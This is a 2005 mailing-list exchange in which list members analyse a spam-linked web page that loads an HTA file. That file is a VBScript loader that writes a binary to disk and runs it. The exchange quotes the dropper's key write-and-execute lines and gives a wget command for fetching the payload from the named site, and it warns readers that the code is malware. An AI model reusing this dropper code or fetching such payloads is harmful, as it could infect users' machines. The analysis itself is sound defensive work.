On Thursday, September 1, 2005, 11:59:38 AM, Kenneth Porter wrote: > --On Thursday, September 01, 2005 11:50 AM -0700 Kenneth Porter > <[EMAIL PROTECTED]> wrote:
>> Interesting. The link in that spam leads to a page containing just a news >> article with the same text, and a "next article" link. But inspection of >> the page source reveals this bit of JavaScript. Any idea what it does? (I >> threw some spaces inside the script tags so hopefully OE users on the >> list won't see this run.) Mozilla's JavaScript console complains about >> some errors. > Ok, a bit more investigation shows that it tries to load /w.hta from the > same site. This is a vbscript program that attempts to write a "text" file > of some binary and then execute it via the MS media player API's. Smells > like an attempt to infect the target with some virus. > This command can be used to fetch the file for inspection: > wget -nd -c http://nextermest.com/w.hta > The critical bits of code: > Fi="C:\fh4uh.exe" > set NNM=MSmedia.CreateTextFile(Fi, TRUE) > NNM.Write(R) > NNM.Close() > MSplay.Run (Fi),1,TRUE > MSmedia.DeleteFile(Fi) > self.Close > R contains a binary string; its initialization takes up most of the file. It's called a malware loader. Don't load it or it will turn your computer into a spam sender, virus sender, cracker, DDOSer, or whatever else the bad guys want it to do. Visiting sites like these unprotected is enough to load the malware onto your computer. Jeff C.
